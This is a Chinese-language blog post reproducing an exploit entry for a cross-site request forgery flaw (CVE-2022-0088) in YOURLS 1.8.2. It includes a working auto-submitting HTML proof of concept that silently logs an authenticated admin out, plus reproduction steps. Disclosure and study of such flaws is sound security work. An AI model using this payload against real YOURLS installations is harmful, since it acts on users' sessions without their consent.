YOURLS 1.8.2 CSRF漏洞利用详解

本文详细介绍了YOURLS 1.8.2版本中存在的跨站请求伪造(CSRF)漏洞(CVE-2022-0088),并提供了完整的漏洞概念验证(PoC)代码和复现步骤,展示了如何利用该漏洞在用户不知情的情况下执行登出操作。

Exploit Title: YOURLS 1.8.2 - Cross-Site Request Forgery (CSRF)

Date: 2025-11-25

Exploit Author: CodeSecLab

Vendor Homepage: https://github.com/yourls/yourls/

Software Link: https://github.com/yourls/yourls/

Version: 1.8.2

Tested on: Windows

CVE : CVE-2022-0088

Proof Of Concept

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>CSRF PoC</title>
</head>
<body>
    <h1>CSRF Proof of Concept</h1>
    <form action="http://yourls/admin/index.php" method="GET">
        <input type="hidden" name="action" value="logout">
        <input type="submit" value="Submit CSRF Request">
    </form>
    <script>
        document.forms[0].submit();
    </script>
</body>
</html>

当已认证的漏洞应用用户访问此HTML页面时,页面将自动提交一个请求,在不经用户同意的情况下将其登出,从而演示了该CSRF漏洞。

Steps to Reproduce

  1. 将上述代码保存为 poc.html
  2. 登录你的YOURLS应用,并在同一浏览器中打开该文件。
  3. 观察结果。
comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计